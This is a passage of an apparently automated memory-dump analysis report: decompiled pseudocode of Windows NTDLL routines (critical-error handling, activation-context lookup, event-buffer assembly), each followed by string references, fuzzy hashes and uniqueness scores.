                                        				void* _t61;
                                        				intOrPtr _t62;
                                        				void* _t64;
                                        				signed int _t65;
                                        				signed int _t66;
                                        
                                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                        				_v8 =  *0x548d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                        				_v105 = __edx;
                                        				_push( &_v92);
                                        				_t52 = 0;
                                        				_push(0);
                                        				_push(0);
                                        				_push( &_v104);
                                        				_push(0);
                                        				_t59 = __ecx;
                                        				_t55 = 2;
                                        				if(E053B4120(_t55, __ecx) < 0) {
                                        					_t35 = 0;
                                        					L8:
                                        					_pop(_t61);
                                        					_pop(_t64);
                                        					_pop(_t53);
                                        					return E053DB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                        				}
                                        				_v96 = _v100;
                                        				_t38 = _v92;
                                        				if(_t38 != 0) {
                                        					_v104 = _t38;
                                        					_v100 = _v88;
                                        					_t40 = _v84;
                                        				} else {
                                        					_t40 = 0;
                                        				}
                                        				_v72 = _t40;
                                        				_v68 =  &_v104;
                                        				_push( &_v52);
                                        				_v76 = 0x18;
                                        				_push( &_v76);
                                        				_v64 = 0x40;
                                        				_v60 = _t52;
                                        				_v56 = _t52;
                                        				_t44 = E053D98D0();
                                        				_t62 = _v88;
                                        				_t65 = _t44;
                                        				if(_t62 != 0) {
                                        					asm("lock xadd [edi], eax");
                                        					if((_t44 | 0xffffffff) != 0) {
                                        						goto L4;
                                        					}
                                        					_push( *((intOrPtr*)(_t62 + 4)));
                                        					E053D95D0();
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                        					goto L4;
                                        				} else {
                                        					L4:
                                        					L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                        					if(_t65 >= 0) {
                                        						_t52 = 1;
                                        					} else {
                                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                        						}
                                        					}
                                        					_t35 = _t52;
                                        					goto L8;
                                        				}
                                        			}


































                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 239cd90740ed39b34b0221026409eeab770f9301b748c37c850095b422276c4b
                                        • Instruction ID: db1569467a474595b0061fb49446849fd1da9ab8f3fdbd377e98bc90864e5478
                                        • Opcode Fuzzy Hash: 239cd90740ed39b34b0221026409eeab770f9301b748c37c850095b422276c4b
                                        • Instruction Fuzzy Hash: DA31BFB26083859FC311DF68C984AABFFE9FB89654F00097EF99583650D634DD05CBA2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 72%
                                        			E053A1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				intOrPtr* _t26;
                                        				intOrPtr _t29;
                                        				void* _t30;
                                        				signed int _t31;
                                        
                                        				_t27 = __ecx;
                                        				_t29 = __edx;
                                        				_t31 = 0;
                                        				_v8 = __edx;
                                        				if(__edx == 0) {
                                        					L18:
                                        					_t30 = 0xc000000d;
                                        					goto L12;
                                        				} else {
                                        					_t26 = _a4;
                                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                        						goto L18;
                                        					} else {
                                        						E053DBB40(__ecx,  &_v16, __ecx);
                                        						_push(_t26);
                                        						_push(0);
                                        						_push(0);
                                        						_push(_t29);
                                        						_push( &_v16);
                                        						_t30 = E053DA9B0();
                                        						if(_t30 >= 0) {
                                        							_t19 =  *_t26;
                                        							if( *_t26 != 0) {
                                        								goto L7;
                                        							} else {
                                        								 *_a8 =  *_a8 & 0;
                                        							}
                                        						} else {
                                        							if(_t30 != 0xc0000023) {
                                        								L9:
                                        								_push(_t26);
                                        								_push( *_t26);
                                        								_push(_t31);
                                        								_push(_v8);
                                        								_push( &_v16);
                                        								_t30 = E053DA9B0();
                                        								if(_t30 < 0) {
                                        									L12:
                                        									if(_t31 != 0) {
                                        										L053B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                        									}
                                        								} else {
                                        									 *_a8 = _t31;
                                        								}
                                        							} else {
                                        								_t19 =  *_t26;
                                        								if( *_t26 == 0) {
                                        									_t31 = 0;
                                        								} else {
                                        									L7:
                                        									_t31 = L053B4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                        								}
                                        								if(_t31 == 0) {
                                        									_t30 = 0xc0000017;
                                        								} else {
                                        									goto L9;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t30;
                                        			}










                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: WindowsExcludedProcs
                                        • API String ID: 0-3583428290
                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                        • Instruction ID: 367fa89e9efc6fcbed087a2d299fdbc52fafd1d849a4b10ac109a40e5b8794c7
                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                        • Instruction Fuzzy Hash: 5C21F537A00229ABEB22EA55C984FAFF7BEFF80A50F054425FA058B600D770DC00C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E053BF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                        				intOrPtr _t13;
                                        				intOrPtr _t14;
                                        				signed int _t16;
                                        				signed char _t17;
                                        				intOrPtr _t19;
                                        				intOrPtr _t21;
                                        				intOrPtr _t23;
                                        				intOrPtr* _t25;
                                        
                                        				_t25 = _a8;
                                        				_t17 = __ecx;
                                        				if(_t25 == 0) {
                                        					_t19 = 0xc00000f2;
                                        					L8:
                                        					return _t19;
                                        				}
                                        				if((__ecx & 0xfffffffe) != 0) {
                                        					_t19 = 0xc00000ef;
                                        					goto L8;
                                        				}
                                        				_t19 = 0;
                                        				 *_t25 = 0;
                                        				_t21 = 0;
                                        				_t23 = "Actx ";
                                        				if(__edx != 0) {
                                        					if(__edx == 0xfffffffc) {
                                        						L21:
                                        						_t21 = 0x200;
                                        						L5:
                                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                        						 *_t25 = _t13;
                                        						L6:
                                        						if(_t13 == 0) {
                                        							if((_t17 & 0x00000001) != 0) {
                                        								 *_t25 = _t23;
                                        							}
                                        						}
                                        						L7:
                                        						goto L8;
                                        					}
                                        					if(__edx == 0xfffffffd) {
                                        						 *_t25 = _t23;
                                        						_t13 = _t23;
                                        						goto L6;
                                        					}
                                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                        					 *_t25 = _t13;
                                        					L14:
                                        					if(_t21 == 0) {
                                        						goto L6;
                                        					}
                                        					goto L5;
                                        				}
                                        				_t14 = _a4;
                                        				if(_t14 != 0) {
                                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                        					if(_t16 <= 1) {
                                        						_t21 = 0x1f8;
                                        						_t13 = 0;
                                        						goto L14;
                                        					}
                                        					if(_t16 == 2) {
                                        						goto L21;
                                        					}
                                        					if(_t16 != 4) {
                                        						_t19 = 0xc00000f0;
                                        						goto L7;
                                        					}
                                        					_t13 = 0;
                                        					goto L6;
                                        				} else {
                                        					_t21 = 0x1f8;
                                        					goto L5;
                                        				}
                                        			}












                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: Actx
                                        • API String ID: 0-89312691
                                        • Opcode ID: ff26280310f05e36a6cfaf1789db3ccb3fe40353bf411ca99eee4711614829b0
                                        • Instruction ID: 5322ad8771654d742d9249246808884fdad48beac5549cb6719cfd64e217110e
                                        • Opcode Fuzzy Hash: ff26280310f05e36a6cfaf1789db3ccb3fe40353bf411ca99eee4711614829b0
                                        • Instruction Fuzzy Hash: 601196357086029BFB248D1D8C927F6729BFB856D4F3465BAD666CBF91D6F0C8408340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 71%
                                        			E05448DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr _t35;
                                        				void* _t41;
                                        
                                        				_t40 = __esi;
                                        				_t39 = __edi;
                                        				_t38 = __edx;
                                        				_t35 = __ecx;
                                        				_t34 = __ebx;
                                        				_push(0x74);
                                        				_push(0x5470d50);
                                        				E053ED0E8(__ebx, __edi, __esi);
                                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                        					E05425720(0x65, 0, "Critical error detected %lx\n", _t35);
                                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                        						asm("int3");
                                        						 *(_t41 - 4) = 0xfffffffe;
                                        					}
                                        				}
                                        				 *(_t41 - 4) = 1;
                                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                        				 *((intOrPtr*)(_t41 - 0x64)) = L053EDEF0;
                                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                        				_push(_t41 - 0x70);
                                        				L053EDEF0(1, _t38);
                                        				 *(_t41 - 4) = 0xfffffffe;
                                        				return E053ED130(_t34, _t39, _t40);
                                        			}






                                        Strings
                                        • Critical error detected %lx, xrefs: 05448E21
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: Critical error detected %lx
                                        • API String ID: 0-802127002
                                        • Opcode ID: 59ad29cf3fb2917f73413c7de1aac3eaa7db14f697b2c4b24c2f7d598ccdbf7b
                                        • Instruction ID: 8397c7c05d8ea856b3f48a7c0c1b734d14402f8c38b7344a487717adf3e95957
                                        • Opcode Fuzzy Hash: 59ad29cf3fb2917f73413c7de1aac3eaa7db14f697b2c4b24c2f7d598ccdbf7b
                                        • Instruction Fuzzy Hash: 29113975D55348EAEF25DFA8850A7EDBBB1BB04714F34865ED429AB381C3344602CF14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0542FF60
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true
                                        • Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp
                                        • Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
                                        Similarity
                                        • API ID:
                                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                        • API String ID: 0-1911121157
                                        • Opcode ID: f503d555191f030ba50fc6211c1bfdd849bd749ad3f3c62a0c36b006f8cad2ab
                                        • Instruction ID: 702b0c4f053e9562dea4e6a414ca47f549725e9b2e1a1b3a0f6e22fcc22b63f3
                                        • Opcode Fuzzy Hash: f503d555191f030ba50fc6211c1bfdd849bd749ad3f3c62a0c36b006f8cad2ab
                                        • Instruction Fuzzy Hash: 7E1125716101A4EFDB12EB10C849FE97BB1FB08700F958089F0055B2A0C7389944DB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E05465BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				signed int _t296;
                                        				signed char _t298;
                                        				signed int _t301;
                                        				signed int _t306;
                                        				signed int _t310;
                                        				signed char _t311;
                                        				intOrPtr _t312;
                                        				signed int _t313;
                                        				void* _t327;
                                        				signed int _t328;
                                        				intOrPtr _t329;
                                        				intOrPtr _t333;
                                        				signed char _t334;
                                        				signed int _t336;
                                        				void* _t339;
                                        				signed int _t340;
                                        				signed int _t356;
                                        				signed int _t362;
                                        				short _t367;
                                        				short _t368;
                                        				short _t373;
                                        				signed int _t380;
                                        				void* _t382;
                                        				short _t385;
                                        				signed short _t392;
                                        				signed char _t393;
                                        				signed int _t395;
                                        				signed char _t397;
                                        				signed int _t398;
                                        				signed short _t402;
                                        				void* _t406;
                                        				signed int _t412;
                                        				signed char _t414;
                                        				signed short _t416;
                                        				signed int _t421;
                                        				signed char _t427;
                                        				intOrPtr _t434;
                                        				signed char _t435;
                                        				signed int _t436;
                                        				signed int _t442;
                                        				signed int _t446;
                                        				signed int _t447;
                                        				signed int _t451;
                                        				signed int _t453;
                                        				signed int _t454;
                                        				signed int _t455;
                                        				intOrPtr _t456;
                                        				intOrPtr* _t457;
                                        				short _t458;
                                        				signed short _t462;
                                        				signed int _t469;
                                        				intOrPtr* _t474;
                                        				signed int _t475;
                                        				signed int _t479;
                                        				signed int _t480;
                                        				signed int _t481;
                                        				short _t485;
                                        				signed int _t491;
                                        				signed int* _t494;
                                        				signed int _t498;
                                        				signed int _t505;
                                        				intOrPtr _t506;
                                        				signed short _t508;
                                        				signed int _t511;
                                        				void* _t517;
                                        				signed int _t519;
                                        				signed int _t522;
                                        				void* _t523;
                                        				signed int _t524;
                                        				void* _t528;
                                        				signed int _t529;
                                        
                                        				_push(0xd4);
                                        				_push(0x5471178);
                                        				E053ED0E8(__ebx, __edi, __esi);
                                        				_t494 = __edx;
                                        				 *(_t528 - 0xcc) = __edx;
                                        				_t511 = __ecx;
                                        				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                        				 *(_t528 - 0xbc) = __ecx;
                                        				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                        				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                        				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                        				_t427 = 0;
                                        				 *(_t528 - 0x74) = 0;
                                        				 *(_t528 - 0x9c) = 0;
                                        				 *(_t528 - 0x84) = 0;
                                        				 *(_t528 - 0xac) = 0;
                                        				 *(_t528 - 0x88) = 0;
                                        				 *(_t528 - 0xa8) = 0;
                                        				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                        				if( *(_t528 + 0x1c) <= 0x80) {
                                        					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                        					if(__eflags != 0) {
                                        						_t421 = E05464C56(0, __edx, __ecx, __eflags);
                                        						__eflags = _t421;
                                        						if(_t421 != 0) {
                                        							 *((intOrPtr*)(_t528 - 4)) = 0;
                                        							E053DD000(0x410);
                                        							 *(_t528 - 0x18) = _t529;
                                        							 *(_t528 - 0x9c) = _t529;
                                        							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                        							E05465542(_t528 - 0x9c, _t528 - 0x84);
                                        						}
                                        					}
                                        					_t435 = _t427;
                                        					 *(_t528 - 0xd0) = _t435;
                                        					_t474 = _t511 + 0x65;
                                        					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                        					_t511 = 0x18;
                                        					while(1) {
                                        						 *(_t528 - 0xa0) = _t427;
                                        						 *(_t528 - 0xbc) = _t427;
                                        						 *(_t528 - 0x80) = _t427;
                                        						 *(_t528 - 0x78) = 0x50;
                                        						 *(_t528 - 0x79) = _t427;
                                        						 *(_t528 - 0x7a) = _t427;
                                        						 *(_t528 - 0x8c) = _t427;
                                        						 *(_t528 - 0x98) = _t427;
                                        						 *(_t528 - 0x90) = _t427;
                                        						 *(_t528 - 0xb0) = _t427;
                                        						 *(_t528 - 0xb8) = _t427;
                                        						_t296 = 1 << _t435;
                                        						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                        						__eflags = _t436 & _t296;
                                        						if((_t436 & _t296) != 0) {
                                        							goto L92;
                                        						}
                                        						__eflags =  *((char*)(_t474 - 1));
                                        						if( *((char*)(_t474 - 1)) == 0) {
                                        							goto L92;
                                        						}
                                        						_t301 =  *_t474;
                                        						__eflags = _t494[1] - _t301;
                                        						if(_t494[1] <= _t301) {
                                        							L10:
                                        							__eflags =  *(_t474 - 5) & 0x00000040;
                                        							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                        								L12:
                                        								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                        								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                        									goto L92;
                                        								}
                                        								_t442 =  *(_t474 - 0x11) & _t494[3];
                                        								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                        								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                        									goto L92;
                                        								}
                                        								__eflags = _t442 -  *(_t474 - 0x11);
                                        								if(_t442 !=  *(_t474 - 0x11)) {
                                        									goto L92;
                                        								}
                                        								L15:
                                        								_t306 =  *(_t474 + 1) & 0x000000ff;
                                        								 *(_t528 - 0xc0) = _t306;
                                        								 *(_t528 - 0xa4) = _t306;
                                        								__eflags =  *0x54860e8;
                                        								if( *0x54860e8 != 0) {
                                        									__eflags = _t306 - 0x40;
                                        									if(_t306 < 0x40) {
                                        										L20:
                                        										asm("lock inc dword [eax]");
                                        										_t310 =  *0x54860e8; // 0x0
                                        										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                        										__eflags = _t311 & 0x00000001;
                                        										if((_t311 & 0x00000001) == 0) {
                                        											 *(_t528 - 0xa0) = _t311;
                                        											_t475 = _t427;
                                        											 *(_t528 - 0x74) = _t427;
                                        											__eflags = _t475;
                                        											if(_t475 != 0) {
                                        												L91:
                                        												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                        												goto L92;
                                        											}
                                        											asm("sbb edi, edi");
                                        											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                        											_t511 = _t498;
                                        											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                        											__eflags =  *(_t312 - 5) & 1;
                                        											if(( *(_t312 - 5) & 1) != 0) {
                                        												_push(_t528 - 0x98);
                                        												_push(0x4c);
                                        												_push(_t528 - 0x70);
                                        												_push(1);
                                        												_push(0xfffffffa);
                                        												_t412 = E053D9710();
                                        												_t475 = _t427;
                                        												__eflags = _t412;
                                        												if(_t412 >= 0) {
                                        													_t414 =  *(_t528 - 0x98) - 8;
                                        													 *(_t528 - 0x98) = _t414;
                                        													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                        													 *(_t528 - 0x8c) = _t416;
                                        													 *(_t528 - 0x79) = 1;
                                        													_t511 = (_t416 & 0x0000ffff) + _t498;
                                        													__eflags = _t511;
                                        												}
                                        											}
                                        											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                        											__eflags = _t446 & 0x00000004;
                                        											if((_t446 & 0x00000004) != 0) {
                                        												__eflags =  *(_t528 - 0x9c);
                                        												if( *(_t528 - 0x9c) != 0) {
                                        													 *(_t528 - 0x7a) = 1;
                                        													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                        													__eflags = _t511;
                                        												}
                                        											}
                                        											_t313 = 2;
                                        											_t447 = _t446 & _t313;
                                        											__eflags = _t447;
                                        											 *(_t528 - 0xd4) = _t447;
                                        											if(_t447 != 0) {
                                        												_t406 = 0x10;
                                        												_t511 = _t511 + _t406;
                                        												__eflags = _t511;
                                        											}
                                        											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                        											 *(_t528 - 0x88) = _t427;
                                        											__eflags =  *(_t528 + 0x1c);
                                        											if( *(_t528 + 0x1c) <= 0) {
                                        												L45:
                                        												__eflags =  *(_t528 - 0xb0);
                                        												if( *(_t528 - 0xb0) != 0) {
                                        													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                        													__eflags = _t511;
                                        												}
                                        												__eflags = _t475;
                                        												if(_t475 != 0) {
                                        													asm("lock dec dword [ecx+edx*8+0x4]");
                                        													goto L100;
                                        												} else {
                                        													_t494[3] = _t511;
                                        													_t451 =  *(_t528 - 0xa0);
                                        													_t427 = E053D6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                        													 *(_t528 - 0x88) = _t427;
                                        													__eflags = _t427;
                                        													if(_t427 == 0) {
                                        														__eflags = _t511 - 0xfff8;
                                        														if(_t511 <= 0xfff8) {
                                        															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                        															asm("sbb ecx, ecx");
                                        															__eflags = (_t451 & 0x000000e2) + 8;
                                        														}
                                        														asm("lock dec dword [eax+edx*8+0x4]");
                                        														L100:
                                        														goto L101;
                                        													}
                                        													_t453 =  *(_t528 - 0xa0);
                                        													 *_t494 = _t453;
                                        													_t494[1] = _t427;
                                        													_t494[2] =  *(_t528 - 0xbc);
                                        													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                        													 *_t427 =  *(_t453 + 0x24) | _t511;
                                        													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                        													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													__eflags =  *(_t528 + 0x14);
                                        													if( *(_t528 + 0x14) == 0) {
                                        														__eflags =  *[fs:0x18] + 0xf50;
                                        													}
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													asm("movsd");
                                        													__eflags =  *(_t528 + 0x18);
                                        													if( *(_t528 + 0x18) == 0) {
                                        														_t454 =  *(_t528 - 0x80);
                                        														_t479 =  *(_t528 - 0x78);
                                        														_t327 = 1;
                                        														__eflags = 1;
                                        													} else {
                                        														_t146 = _t427 + 0x50; // 0x50
                                        														_t454 = _t146;
                                        														 *(_t528 - 0x80) = _t454;
                                        														_t382 = 0x18;
                                        														 *_t454 = _t382;
                                        														 *((short*)(_t454 + 2)) = 1;
                                        														_t385 = 0x10;
                                        														 *((short*)(_t454 + 6)) = _t385;
                                        														 *(_t454 + 4) = 0;
                                        														asm("movsd");
                                        														asm("movsd");
                                        														asm("movsd");
                                        														asm("movsd");
                                        														_t327 = 1;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 = 0x68;
                                        														 *(_t528 - 0x78) = _t479;
                                        													}
                                        													__eflags =  *(_t528 - 0x79) - _t327;
                                        													if( *(_t528 - 0x79) == _t327) {
                                        														_t524 = _t479 + _t427;
                                        														_t508 =  *(_t528 - 0x8c);
                                        														 *_t524 = _t508;
                                        														_t373 = 2;
                                        														 *((short*)(_t524 + 2)) = _t373;
                                        														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                        														 *((short*)(_t524 + 4)) = 0;
                                        														_t167 = _t524 + 8; // 0x8
                                        														E053DF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                        														_t529 = _t529 + 0xc;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                        														 *(_t528 - 0x78) = _t479;
                                        														_t380 =  *(_t528 - 0x80);
                                        														__eflags = _t380;
                                        														if(_t380 != 0) {
                                        															_t173 = _t380 + 4;
                                        															 *_t173 =  *(_t380 + 4) | 1;
                                        															__eflags =  *_t173;
                                        														}
                                        														_t454 = _t524;
                                        														 *(_t528 - 0x80) = _t454;
                                        														_t327 = 1;
                                        														__eflags = 1;
                                        													}
                                        													__eflags =  *(_t528 - 0xd4);
                                        													if( *(_t528 - 0xd4) == 0) {
                                        														_t505 =  *(_t528 - 0x80);
                                        													} else {
                                        														_t505 = _t479 + _t427;
                                        														_t523 = 0x10;
                                        														 *_t505 = _t523;
                                        														_t367 = 3;
                                        														 *((short*)(_t505 + 2)) = _t367;
                                        														_t368 = 4;
                                        														 *((short*)(_t505 + 6)) = _t368;
                                        														 *(_t505 + 4) = 0;
                                        														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                        														_t327 = 1;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 = _t479 + _t523;
                                        														 *(_t528 - 0x78) = _t479;
                                        														__eflags = _t454;
                                        														if(_t454 != 0) {
                                        															_t186 = _t454 + 4;
                                        															 *_t186 =  *(_t454 + 4) | 1;
                                        															__eflags =  *_t186;
                                        														}
                                        														 *(_t528 - 0x80) = _t505;
                                        													}
                                        													__eflags =  *(_t528 - 0x7a) - _t327;
                                        													if( *(_t528 - 0x7a) == _t327) {
                                        														 *(_t528 - 0xd4) = _t479 + _t427;
                                        														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                        														E053DF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                        														_t529 = _t529 + 0xc;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 =  *(_t528 - 0x78) + _t522;
                                        														 *(_t528 - 0x78) = _t479;
                                        														__eflags = _t505;
                                        														if(_t505 != 0) {
                                        															_t199 = _t505 + 4;
                                        															 *_t199 =  *(_t505 + 4) | 1;
                                        															__eflags =  *_t199;
                                        														}
                                        														_t505 =  *(_t528 - 0xd4);
                                        														 *(_t528 - 0x80) = _t505;
                                        													}
                                        													__eflags =  *(_t528 - 0xa8);
                                        													if( *(_t528 - 0xa8) != 0) {
                                        														_t356 = _t479 + _t427;
                                        														 *(_t528 - 0xd4) = _t356;
                                        														_t462 =  *(_t528 - 0xac);
                                        														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                        														_t485 = 0xc;
                                        														 *((short*)(_t356 + 2)) = _t485;
                                        														 *(_t356 + 6) = _t462;
                                        														 *((short*)(_t356 + 4)) = 0;
                                        														_t211 = _t356 + 8; // 0x9
                                        														E053DF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                        														E053DFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                        														_t529 = _t529 + 0x18;
                                        														_t427 =  *(_t528 - 0x88);
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t505 =  *(_t528 - 0xd4);
                                        														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                        														 *(_t528 - 0x78) = _t479;
                                        														_t362 =  *(_t528 - 0x80);
                                        														__eflags = _t362;
                                        														if(_t362 != 0) {
                                        															_t222 = _t362 + 4;
                                        															 *_t222 =  *(_t362 + 4) | 1;
                                        															__eflags =  *_t222;
                                        														}
                                        													}
                                        													__eflags =  *(_t528 - 0xb0);
                                        													if( *(_t528 - 0xb0) != 0) {
                                        														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                        														_t458 = 0xb;
                                        														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                        														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                        														 *((short*)(_t427 + 4 + _t479)) = 0;
                                        														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                        														E053DFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                        														_t529 = _t529 + 0xc;
                                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                        														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                        														 *(_t528 - 0x78) = _t479;
                                        														__eflags = _t505;
                                        														if(_t505 != 0) {
                                        															_t241 = _t505 + 4;
                                        															 *_t241 =  *(_t505 + 4) | 1;
                                        															__eflags =  *_t241;
                                        														}
                                        													}
                                        													_t328 =  *(_t528 + 0x1c);
                                        													__eflags = _t328;
                                        													if(_t328 == 0) {
                                        														L87:
                                        														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
